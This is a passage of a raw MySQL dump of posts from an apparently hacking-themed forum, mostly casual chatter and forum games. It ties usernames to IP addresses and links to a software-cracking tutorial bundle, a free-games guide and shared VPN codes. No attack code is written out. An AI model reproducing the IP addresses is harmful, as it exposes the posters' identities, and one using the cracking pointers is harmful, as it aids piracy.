'0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3415', '253', '1106', '56', 'RE: Count to 200', '0', '10', 'swa4567', '1349409278', '45. Hahaha I got an odd number :P', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '4807448936e28d7a242ba81f6a8ac71b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3416', '487', '2354', '56', 'RE: Corrupt a wish', '0', '10', 'swa4567', '1349409389', 'Declined because no one declined a wish in this thread :P I wish I was a smart guy like joker.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '568a0517be9babaf8ffaa057b113c8d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3417', '238', '1021', '56', 'RE: Ban the user above you', '0', '10', 'swa4567', '1349409437', 'Banned for having your PSN in your sig.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '3b1705a0dd4b106b372db24a5995beee', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3418', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '4', 'Triple H', '1349409560', 'I agree with aathy theres to0o0o0 much space and try to add like a design or symbol.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9b63b9e7b3e7614f1fbb10b6390a73f8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3419', '674', '3412', '24', 'RE: Oh NO! Learn how to destroy your hard drive completely', '0', '4', 'Triple H', '1349409608', 'Well-written guide Bane thanks for writing this. Useful for every hacker hat.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '03eaac727b3e144ef3e901744daf2117', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3420', '670', '3408', '16', 'RE: [Guide]How to get free Blizzard games/products.', '0', '4', 'Triple H', '1349409791', 'I won\'t be giving this a try but thanks for contributing and looks convincing.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '35caa5c6e9b3e855a494dc82d3e3fe1e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3421', '627', '3350', '33', 'RE: What can I do to improve this?', '0', '2', 'Apathy', '1349409958', '[quote=\'iTzIpod\' pid=\'3350\' dateline=\'1349378135\'] Can you give me more tips? Like if I restart it, then what would I do then? And no shit that there is way too much empty space... -.- That\'s why I asked if someone could help me. [/quote] You should not answer Constructive criticism in that manner. Place it just to the right oh the middle. Add more effects such as c4d\'s as well. It is quite bland. Do not go with that type o just plain very beginner smudge tag. Spruce it up with color and other elements. Also use flow.', '173.206.137.176', '-1378973264', '0', '0', '0', '0', '1', 'fb8e0d4cc53a31aaf8b3f22566db7a29', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3422', '674', '3412', '24', 'RE: Oh NO! Learn how to destroy your hard drive completely', '0', '2', 'Apathy', '1349410143', 'I remember reading this a long time ago. Thanks for reminding me about it..', '173.206.137.176', '-1378973264', '0', '0', '0', '0', '1', '47bef40ca8e7daf17b685f9fae2a139e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3423', '673', '3410', '29', 'RE: The only allowed \"how to deep web\" tutorial here.', '0', '2', 'Apathy', '1349410414', 'A nice tutorial. Thanks for the share. :)', '173.206.137.176', '-1378973264', '0', '0', '0', '0', '1', '7636f056c070abefb12aa87ac40f8773', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3424', '659', '3293', '64', 'RE: Stolen (2012) Movie RIP', '0', '1', 't3h jok3r', '1349410450', 'Some people say that it\'s a racism movie but some people like it. I\'m confused :(', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7e0444854377aa2c507b52dc456b9e16', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3425', '654', '3329', '9', 'RE: Make money typing captchas', '0', '1', 't3h jok3r', '1349410632', '[quote=\'iTzIpod\' pid=\'3329\' dateline=\'1349352046\'] I don\'t know. I just remember I posted this thread... Not even sure now... :/ Did it get deleted? [/quote] Maybe you posted when we had to move to a new server and I had a old backup.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '50aa4f6bbe26c94b00fb8f9445174cfd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3426', '675', '0', '65', 'The Julian Assange Story', '0', '205', 'mothered', '1349413453', 'Greetz everyone, Where I reside In Australia, the Julian Assange story will go to air this Sunday. I\'m pretty excited and looking forward to watching It. Here\'s a sneak peak: [video=youtube]http://www.youtube.com/watch?v=iGp3mUIemL0[/video] The ressemblance between the actor and Julian Is amazing. What do you think?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '35ea9bd4e4e070e96b0ccb0f1040fc86', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3427', '676', '0', '12', 'Cracking Tuts/Reverse Enginnering', '0', '205', 'mothered', '1349414067', 'Greetings to all, I have collected a few tutorials, that guide you through cracking programs and applications. All cracking tools are provided, as well as the target programs. They cover the absolute beginning to the more advanced. They are old, but perfect for someone who wishes to get Into the scene, then can further their skills via their own volition. [b][color=#DAA520][u]Tutorials:[/u][/color][/b] [b]** Serial Fishing ** Internal Keygen ** Unpacking & Patching ** Unpacking & Patching (A more complex case) ** Inline Patching ** Packers Theory ** Cracking Lost Marble\'s Moho ** Breakpoints Theory ** Defeating Magic Byte Protection ** Anti-Tampering Techniques Theory[/b] [b][color=#DAA520][u]Tools:[/u][/color][/b] [b]** Olly Dbg v1.1 ** Olly Dbg Plugins ** Diablos 2002 Unversal patcher ** Hex Workshop v3.2 ** Import reconstructor v1.6 ** PEID v0.94 ** Hex Workshop v4.3 ** W32Dasm Disassembler/Debugger ** Armadillo Unpacker[/b] [b][color=#DAA520]PLEASE NOTE:[/color][/b] Due to the nature of the cracking tools, some Antivirus software may alert. If sceptical, run In a VM or Sandboxie, but the tools are clean. [b][color=#DAA520]Download:[/color][/b] http://www.mediafire.com/?at9q6ere2cllkp1', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd4cb57a5f75fe5fde633f2df356a8948', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3428', '677', '0', '24', 'Windows Memory Limits', '0', '205', 'mothered', '1349414429', 'Greetz to all, So let\'s say you have a lappy with 16GB of ram (Like me), and have the x64 architecture Installed to support the ram\'s capacity. That\'ll be fine yeah? Wrong. Different editions of Windows 7 have different memory limits, hence the less superior 64 Bit editions, may not support the Installed ram. This also applies Vista. Read about It here: http://msdn.microsoft.com/en-us/library/aa366778(v=vs.85).aspx', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'a5c9cef3382888df95cace37269155a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3429', '674', '3412', '24', 'RE: Oh NO! Learn how to destroy your hard drive completely', '0', '205', 'mothered', '1349414607', 'This Is simply great. Well done mate, very well documented and elaborated.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '1535aca8fa7332e794fd9e321f0e719f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3430', '238', '1021', '56', 'RE: Ban the user above you', '0', '199', 'Anonymous™', '1349419414', 'Banned for not having 100 posts.', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', 'f96dbc13948e329d556415599dd41eee', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3431', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1349419573', 'http://www.youtube.com/watch?v=FerfhDnaNrI&feature=g-all-u', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', 'c4ed368f3010e01ef94774fa124e746b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3432', '253', '1106', '56', 'RE: Count to 200', '0', '100', '??zg???g????61', '1349433469', '46. I got an even number :P', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '4b07d8ea74334e68e0b23e215fa5a13a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3433', '238', '1021', '56', 'RE: Ban the user above you', '0', '100', '??zg???g????61', '1349433512', 'Banned for not having 25 posts.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '2f9603af5e291ac00b385b0ec8f7073a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3434', '238', '1021', '56', 'RE: Ban the user above you', '0', '199', 'Anonymous™', '1349434288', 'Banned for not having 10 rep.', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '60d83ea9ad4eb683f9647d87e6d96bec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3435', '253', '1106', '56', 'RE: Count to 200', '0', '199', 'Anonymous™', '1349434399', '47. http://www.youtube.com/watch?v=O87Vsr_1afI&feature=g-vrec', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '2c105150008d751175ae1b210c72229b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3436', '676', '3427', '12', 'RE: Cracking Tuts/Reverse Enginnering', '0', '199', 'Anonymous™', '1349434673', 'Thanks for sharing Mothered. I recommend that you run this in Sandboxie.', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '7e07569e17e086d9fdc7f29cffd8656a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3437', '238', '1021', '56', 'RE: Ban the user above you', '0', '100', '??zg???g????61', '1349436510', 'Banned for not aligning your signature in the center.', '70.192.14.101', '1186991717', '1', '0', '0', '0', '1', '849f969c68bfd53cf104d472d29cbf21', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3438', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1349436624', 'Granted. But t3h jok3r got brain washed and is now stupid :p I wish I had an awesome life. (Big house, nice car, sexy wife, etc ) :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8e2f3992cf6c07f9add8250aa07d25a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3439', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '82', 'iTzIpod', '1349436664', 'Thanks for that Apathy. I\'ll see how it goes.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2879a2b21847a7e227ff1be4dbee599c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3440', '654', '3226', '9', 'RE: Make money typing captchas', '0', '82', 'iTzIpod', '1349436706', 'I\'m guessing that too then. Oh well. Guess that explains why I lost some posts before.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '580949f9149076cddc942e7e3199b53f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3441', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349436740', 'http://l33thacking.net/thread-253.html Lool I don\'t know why I copied and pasted this..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6f91c5ce82c37a694d1d8c94f71883b3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3442', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1349436775', 'Banned for no reason at all.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd135715dac0bbf75a0eaaa5478b74a3d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3443', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349436808', '48. Lik an iPod.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4f0581a3c16949feea8b3d96bc1524a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3444', '670', '3408', '16', 'RE: [Guide]How to get free Blizzard games/products.', '0', '62', 'R?????zo?', '1349438713', 'looks convincing, does this works on recently made accounts (dutch ones)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '75f965f74ea6afbd5b248f6a3199f5f5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3445', '51', '3252', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '205', 'mothered', '1349441171', '[quote=\'iTzGRONgamer61\' pid=\'3252\' dateline=\'1349284335\'] I have a picture about this ;D here- [img]http://i.imgur.com/lHshj.png[/img] [/quote] That\'s a great way of showing Google\'s traces on you. It gives everyone a visual.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '7e15eebc8258d99e1d06e2d718f3c7f8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3446', '678', '0', '29', 'Get Free Domain names & Webhosting Packages e-Book [Written by me!]', '0', '172', 'MistaCode', '1349443882', 'As I was bored and angry when they sent me a unpayed invoice to home? As I was stupid to put my real address & Name there... Well here it is :D [color=#FF0000]NOTE:[/color] [color=#FFD700]Please read The Warnings![/color] Download: http://adf.ly/DReIZ Password: l33thacking', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'f0ce4a6cc78b5a53f3560d41b2ed4372', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3447', '376', '3348', '54', 'RE: ExpressVPN codes', '0', '62', 'R?????zo?', '1349452950', '[quote=\'iTzGRONgamer61\' pid=\'3348\' dateline=\'1349376171\'] Aww none of them work ;(( [/quote] probably outdated.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '7058eecc57a4b183ae0806926cb02d19', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5959', '431', '5930', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1350859125', '[quote=\'VirtualLegend\' pid=\'5930\' dateline=\'1350848314\'] Can you make me a userbar for my upcoming group Marketers Size: Idk the size of a Userbar Colour Scheme: Green Render/Image: Dollar image Text: Marketers Anything else: Suprise me Contact me on skype when ur done of when ur stuck [/quote] had no idea what to make So I made it like this: [img]http://i.imgur.com/ifvO7.gif[/img] Hope you like it, pm\'ed you on skype too.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '91c900448a49552bdface25741dbfb97', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3449', '679', '0', '4', 'flamingworm here!', '0', '222', 'Exposé', '1349462521', 'Yoo what\'s up guys...flamingworm here. I\'m from a couple of forums across the interwebzz.. I got a funny pm from someone named lily on AF and was like mmk..Idk how active ill be but yeh :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '63170ac971b0813c97bbec1fe8efc9a3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3450', '679', '3449', '4', 'RE: flamingworm here!', '0', '1', 't3h jok3r', '1349462885', 'Welcome to L33THacking.net, hope you like our website and correct if me I\'m wrong but you are from ubers and HF right?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '67fd2fab35fd7519fad907d4d068e14a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3451', '679', '3449', '4', 'RE: flamingworm here!', '0', '222', 'Exposé', '1349462948', 'Nop...:cool:...i\'m flamingworm from l33thacking :D', '74.76.76.132', '1246514308', '0', '0', '1', '1349463083', '1', '2204418c1d00e48146884ee0309783e9', '0', '1349463083'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3452', '253', '1106', '56', 'RE: Count to 200', '0', '222', 'Exposé', '1349463021', '49. Omonomnom I\'m new here!', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '1897a5d7bdd73decdbb0604ddbfda97e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3453', '679', '3449', '4', 'RE: flamingworm here!', '0', '1', 't3h jok3r', '1349463126', 'Damn I thought I was right :\'(', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '624bc91df8ed1919408cd0cc7eb6443a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3454', '679', '3449', '4', 'RE: flamingworm here!', '0', '222', 'Exposé', '1349463203', 'Haha ok...and im not a big hacker...but more of a social engineer and programmer + gfx guy. So hopefully I can be active a little bit', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '75af78949480683164986b086c226b05', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3455', '253', '1106', '56', 'RE: Count to 200', '0', '62', 'R?????zo?', '1349463213', '50. one day I will get to this age :/', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9b88552b843777478dda58881f22d729', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3456', '679', '3449', '4', 'RE: flamingworm here!', '0', '1', 't3h jok3r', '1349463282', 'That\'s cool what coding languages you [s]speak[/s] know?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1f1c3d2ee036a4811a7ae5223ed19db4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3457', '680', '0', '35', 'Some of my works...', '0', '222', 'Exposé', '1349463351', 'Some logo\'s that I have made and other stuff.... I know they are simple but it is what I like doing :D [img]http://i.imgur.com/j3BCN.png[/img] [img]http://envisi0n.com/images/devilos/logo.png[/img] [img]http://i.imgur.com/g7Kzm.png[/img] [img]http://i.imgur.com/DFEVA.png[/img] Userbars... [img]http://i.imgur.com/CBCpT.png[/img] [img]http://i.imgur.com/IfWOV.png[/img] [img]http://i.imgur.com/DoM4v.png[/img]', '74.76.76.132', '1246514308', '0', '0', '222', '1350332658', '1', 'ed40cafa84cb0038d89e692e3d50ddab', '0', '1350332658'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4789', '883', '4784', '7', 'RE: Congratz virtual', '0', '222', 'Exposé', '1350333180', 'Everyone gettin Supermod but me.....:rage:', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '4a4450c395cad05848d591d6150cd3a7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3458', '679', '3449', '4', 'RE: flamingworm here!', '0', '222', 'Exposé', '1349463471', 'I know vb.net mostly, a little java, html, php, and css. :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '3bc8a5c654fd16e9f541eebcd0e7c607', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3459', '680', '3457', '35', 'RE: Some of my works...', '0', '1', 't3h jok3r', '1349463515', 'Nice work. I like the font you used on the Global Mod userbar.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f2b96f55319eba775e989538ebabde76', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3460', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '222', 'Exposé', '1349463880', 'Sounds like someone is ragin.....this is not good :(', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'f15d208e8968e08f6907e5597ec8bb02', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3461', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '222', 'Exposé', '1349464059', 'I had no idea there was even a l33thackers.com lol....', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'fc97ed48bd907b6e16a55a468d8178ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, 